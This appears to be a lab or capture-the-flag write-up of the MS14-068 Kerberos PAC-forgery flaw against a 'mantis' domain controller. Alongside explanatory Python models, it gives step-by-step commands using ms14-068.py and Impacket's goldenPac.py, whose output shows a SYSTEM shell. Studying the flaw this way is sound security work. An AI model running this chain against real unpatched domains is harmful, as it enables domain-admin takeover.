Active Directory uses Kerberos as its authentication protocol. In 2014 a flaw was found in the Windows KDC's handling of the Privilege Attribute Certificate (PAC), the signed structure inside a ticket that lists the user's group memberships: the domain controller accepted a PAC whose signatures used an unkeyed checksum (plain MD5), so any domain user could forge a PAC claiming Domain Admins membership and have the DC issue a TGT carrying it. This post calls the result a Golden Ticket; strictly it is a TGT with forged group membership rather than a ticket forged with the krbtgt hash, which is why Impacket's tool for it is named goldenPac.py.
The vulnerability is known as MS14-068 or CVE-2014-6324.
Because it has been public for so long, only old, unpatched Windows Server versions are still affected. Microsoft's fix (KB3011780) shipped for Windows Server 2003 through 2012 R2; the target in this post reports itself as Windows 6.1.7601, i.e. Windows Server 2008 R2 SP1 without that update.
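How the DC gets fooled, as an added example that is not code from the original post, from pykek or from Impacket: a toy model of the KDC's PAC-signature check. Before the patch the KDC verified the PAC signature with whatever checksum type the sender had declared, including unkeyed ones such as RSA-MD5 (type 7), so an attacker holding no key at all could "sign" a PAC that adds the Domain Admins RID (512). The PAC layout and the krbtgt key below are simplified and constructed; the checksum-type numbers are the real ones, and RID 1103 is the RID of the user SID shown in the goldenPac.py output later in this post.

```python
"""Toy model of the PAC-signature check that MS14-068 got wrong.

Added example, not code from the original post, pykek or Impacket. The PAC
layout and the key are simplified and constructed (a real PAC is NDR-encoded
and the keyed checksum uses the krbtgt/service key), but the decision that
mattered is modelled faithfully: does the KDC insist on a keyed checksum
type, or does it verify with whatever type the sender declared?
"""
import hashlib
import hmac
import json
import zlib
from typing import Dict, List, Optional

# Kerberos checksum-type numbers (RFC 3961 / MS-KILE); these are the real IDs.
CRC32 = 1
RSA_MD5 = 7                       # unkeyed: anyone can compute it
HMAC_SHA1_96_AES128 = 15
HMAC_SHA1_96_AES256 = 16
KERB_CHECKSUM_HMAC_MD5 = -138
KEYED_TYPES = {HMAC_SHA1_96_AES128, HMAC_SHA1_96_AES256, KERB_CHECKSUM_HMAC_MD5}

DOMAIN_USERS_RID = 513
DOMAIN_ADMINS_RID = 512

# Constructed secret standing in for the krbtgt key; only the KDC holds it.
KRBTGT_KEY = b"constructed-krbtgt-key-not-a-real-secret"


def checksum(ctype: int, data: bytes, key: Optional[bytes]) -> bytes:
    """Checksum of the given type; keyed types need the key, unkeyed ones ignore it."""
    if ctype == RSA_MD5:
        return hashlib.md5(data).digest()
    if ctype == CRC32:
        return zlib.crc32(data).to_bytes(4, "little")
    if ctype == KERB_CHECKSUM_HMAC_MD5:
        return hmac.new(key, data, hashlib.md5).digest()
    if ctype in (HMAC_SHA1_96_AES128, HMAC_SHA1_96_AES256):
        return hmac.new(key, data, hashlib.sha1).digest()[:12]
    raise ValueError(f"unknown checksum type {ctype}")


def build_pac(user_rid: int, group_rids: List[int], ctype: int, key: Optional[bytes]) -> Dict:
    """Toy PAC: the logon info (user RID + group RIDs) plus a signature over it."""
    logon_info = json.dumps({"user_rid": user_rid, "groups": sorted(group_rids)}).encode()
    return {"logon_info": logon_info, "sig_type": ctype, "sig": checksum(ctype, logon_info, key)}


def kdc_verify_vulnerable(pac: Dict) -> bool:
    """Pre-MS14-068: verify with the checksum type the sender declared."""
    key = KRBTGT_KEY if pac["sig_type"] in KEYED_TYPES else None
    expected = checksum(pac["sig_type"], pac["logon_info"], key)
    return hmac.compare_digest(expected, pac["sig"])


def kdc_verify_patched(pac: Dict) -> bool:
    """Post-patch: unkeyed checksum types are rejected outright."""
    if pac["sig_type"] not in KEYED_TYPES:
        return False
    expected = checksum(pac["sig_type"], pac["logon_info"], KRBTGT_KEY)
    return hmac.compare_digest(expected, pac["sig"])


def groups_in(pac: Dict) -> List[int]:
    """Group RIDs the KDC would copy into the issued ticket if it accepts the PAC."""
    return json.loads(pac["logon_info"])["groups"]


# Constructed inputs: a PAC the KDC itself issued for RID 1103, and a forged
# one for the same user with Domain Admins added and an unkeyed MD5 "signature".
LEGIT_PAC = build_pac(1103, [DOMAIN_USERS_RID], KERB_CHECKSUM_HMAC_MD5, KRBTGT_KEY)
FORGED_PAC = build_pac(1103, [DOMAIN_USERS_RID, DOMAIN_ADMINS_RID], RSA_MD5, None)

if __name__ == "__main__":
    for name, pac in (("legit", LEGIT_PAC), ("forged", FORGED_PAC)):
        print(f"{name:6s} groups={groups_in(pac)} vulnerable_kdc={kdc_verify_vulnerable(pac)} "
              f"patched_kdc={kdc_verify_patched(pac)}")
```

The patched verifier does one extra thing, refusing any checksum type that is not keyed, and everything else follows from it: without the krbtgt key the attacker can no longer produce a signature the KDC will accept. In the real protocol the forged PAC is carried in a TGS-REQ and comes back embedded in a fresh TGT, which is what ms14-068.py and goldenPac.py produce in Step 4.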
Goal
Starting from an ordinary domain user account, obtain a ticket that carries domain-admin privileges and use it to get a SYSTEM shell on the domain controller.
Prerequisites
- A domain user account (any ordinary account; no special rights are needed)
- A Windows Server domain controller that is still vulnerable to MS14-068
Exploitation steps
Step 1: Prepare the environment
- Install the required tools:
```sh
➜ sudo apt-get install krb5-user cifs-utils rdate
```
- Point the domain and the DC's host names at the DC's IP in /etc/hosts:
```sh
➜ cat /etc/hosts | grep mantis
10.10.10.52 mantis.htb.local htb.local mantis
```
- Add the DC as a nameserver in /etc/resolv.conf (listed first, so that names in htb.local resolve through the DC):
```
nameserver 10.10.10.52
nameserver 1.1.1.1
```
- Configure Kerberos in /etc/krb5.conf. Realm names are case-sensitive, so the block under [realms] must be spelled exactly like default_realm (upper-case), the option name is admin_server, and [domain_realm] must map the DC's DNS domain to that realm:
```ini
[libdefaults]
    default_realm = HTB.LOCAL
[realms]
    HTB.LOCAL = {
        kdc = mantis.htb.local:88
        admin_server = mantis.htb.local
        default_domain = htb.local
    }
[domain_realm]
    .htb.local = HTB.LOCAL
    htb.local = HTB.LOCAL
```
- Synchronise the clock with the DC. Kerberos rejects requests whose timestamp differs from the KDC's by more than 5 minutes (the default clock-skew tolerance), so this step is not optional. Both commands need root:
```sh
# option 1
➜ sudo ntpdate 10.10.10.52
# option 2
➜ sudo rdate -n 10.10.10.52
```
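The krb5.conf is the part of this step that most often goes wrong, and the symptoms (kinit failing with "Cannot find KDC for realm", or a ticket that smbclient will not use) are not obviously tied to the file. The following checker is an added example, not code from the original post: it parses a krb5.conf and reports the three mistakes this step is prone to. Both sample configs are constructed; the first deliberately contains a lower-case realm block, the admin_serve typo and [domain_realm] entries for an unrelated domain, the second is the corrected form.

```python
"""Sanity-check a krb5.conf before running kinit against the DC.

Added example, not code from the original post. It catches the mistakes the
krb5.conf in Step 1 is prone to: the block under [realms] must be spelled
exactly like default_realm (realm names are case-sensitive), the option is
admin_server, and [domain_realm] must map the DC's domain to that realm.
Both sample configs below are constructed.
"""
import re
from typing import Dict, List, Optional

REALM_OPTIONS = {"kdc", "admin_server", "master_kdc", "default_domain"}


def parse_krb5_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Tiny krb5.conf reader: 'key = value' per [section]; each
    'NAME = {' block under [realms] becomes its own 'realms/NAME' section."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if m := re.fullmatch(r"\[(\w+)\]", line):
            current = m.group(1)
        elif current == "realms" and (m := re.fullmatch(r"(\S+)\s*=\s*\{", line)):
            current = "realms/" + m.group(1)
        elif line == "}" and current and current.startswith("realms/"):
            current = "realms"
        elif "=" in line and current is not None:
            key, value = (s.strip() for s in line.split("=", 1))
            sections.setdefault(current, {})[key] = value
        if current is not None:
            sections.setdefault(current, {})
    return sections


def check_krb5_conf(text: str) -> List[str]:
    """Return the problems found; an empty list means the file looks usable."""
    cfg = parse_krb5_conf(text)
    problems: List[str] = []
    realm = cfg.get("libdefaults", {}).get("default_realm")
    if not realm:
        return ["[libdefaults] has no default_realm"]
    if realm != realm.upper():
        problems.append(f"default_realm {realm!r} should be upper-case")
    block = cfg.get("realms/" + realm)
    if block is None:
        found = [k.split("/", 1)[1] for k in cfg if k.startswith("realms/")]
        problems.append(f"no [realms] block spelled exactly {realm!r}; found {found}")
        block = cfg.get("realms/" + found[0], {}) if found else {}
    kdc = block.get("kdc")
    if not kdc:
        problems.append("realm block has no 'kdc = host:88' line")
    for key in block:
        if key not in REALM_OPTIONS:
            problems.append(f"unknown realm option {key!r} (did you mean admin_server?)")
    mapping = cfg.get("domain_realm", {})
    if realm not in mapping.values():
        problems.append(f"[domain_realm] maps no domain to {realm!r}")
    if kdc:
        host = kdc.split(":", 1)[0].lower()
        if not any(host.endswith(d.lower()) for d in mapping):
            problems.append(f"[domain_realm] has no entry covering the KDC host {host!r}")
    return problems


# Constructed: a config with the three classic mistakes, and the corrected one.
BROKEN_KRB5_CONF = """\
[libdefaults]
default_realm = HTB.LOCAL
[realms]
htb.local = {
kdc = mantis.htb.local:88
admin_serve = mantis.htb.local
default_domain = htb.local
}
[domain_realm]
.domain.internal = htb.local
domain.internal = htb.local
"""

FIXED_KRB5_CONF = """\
[libdefaults]
default_realm = HTB.LOCAL
[realms]
HTB.LOCAL = {
kdc = mantis.htb.local:88
admin_server = mantis.htb.local
default_domain = htb.local
}
[domain_realm]
.htb.local = HTB.LOCAL
htb.local = HTB.LOCAL
"""

if __name__ == "__main__":
    for label, conf in (("broken", BROKEN_KRB5_CONF), ("fixed", FIXED_KRB5_CONF)):
        print(label, check_krb5_conf(conf) or "ok")
```

Run it against your own /etc/krb5.conf by reading the file into check_krb5_conf before the kinit in Step 2; a lower-case realm block is the one that bites most often, because MIT Kerberos may still find the KDC via DNS SRV records and hide the mistake until a tool without that fallback is used.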
Step 2: Try to obtain a Kerberos ticket
```sh
# request a TGT for the domain user; this also confirms krb5.conf and the clock are right
➜ kinit <username>
Password for <username>@<domain>:
# list the cached tickets. Note the cache file name, here /tmp/krb5cc_0 (the suffix is the UID of the user running kinit)
➜ klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: <username>@<domain>
Valid starting       Expires              Service principal
08/30/2020 16:44:33  08/31/2020 02:44:33  krbtgt/HTB.LOCAL@HTB.LOCAL
	renew until 08/31/2020 16:44:26
```
Step 3: Try to access the c$ share with the current ticket. The -k flag makes smbclient authenticate with the ticket cache instead of a password; the target has to be a host name rather than an IP, because a Kerberos service ticket is requested for cifs/<hostname>.
```sh
# at this point it is expected that we cannot access c$: the user has no admin rights on the DC
➜ smbclient -W htb.local //mantis/c$ -k
tree connect failed: NT_STATUS_ACCESS_DENIED
```
Step 4: Exploit MS14-068
```sh
# get the SID of the current user; lookupnames prints the full SID, whose last field is the RID
➜ rpcclient -U <username> <ip-dc>
rpcclient $> lookupnames <username>
# exploit MS14-068 with pykek's ms14-068.py and obtain a new ticket:
# -s takes the full user SID from above, -d the host name of the domain controller
➜ python ms14-068.py -u <username>@<domain> -s <SID> -d <dc-fqdn>
Password:
[+] Building AS-REQ for mantis.htb.local... Done!
[+] Sending AS-REQ to mantis.htb.local... Done!
[+] Receiving AS-REP from mantis.htb.local... Done!
[+] Parsing AS-REP from mantis.htb.local... Done!
[+] Building TGS-REQ for mantis.htb.local... Done!
[+] Sending TGS-REQ to mantis.htb.local... Done!
[+] Receiving TGS-REP from mantis.htb.local... Done!
[+] Parsing TGS-REP from mantis.htb.local... Done!
[+] Creating ccache file 'TGT_<username>@<domain>.ccache'... Done!
# copy the new ticket over the cache file klist showed in Step 2 (/tmp/krb5cc_0);
# alternatively, leave the cache alone and point KRB5CCNAME at the new file
➜ cp TGT_<username>@<domain>.ccache /tmp/krb5cc_0
# the same user can now access the c$ share
➜ smbclient -W htb.local //mantis/c$ -k
Try "help" to get a list of possible commands.
smb: \>
# remote shell in one step: Impacket's goldenPac.py forges the PAC itself and then
# installs and starts a service on the DC (PsExec-style), as the output shows
➜ goldenPac.py <domain>/<username>:<password>@<dc-fqdn>
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file dnkIDkwn.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service IPbK on mantis.htb.local.....
[*] Starting service IPbK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
```
Note that the User SID printed by goldenPac.py is the Forest SID followed by the RID (1103 here); that is the same value lookupnames returned and the one passed to ms14-068.py with -s. The service binary and service name in the output are random and differ on every run.
References
- https://wizard32.net/blog/knock-and-pass-kerberos-exploitation.html
- https://0xdf.gitlab.io/2020/09/03/htb-mantis.html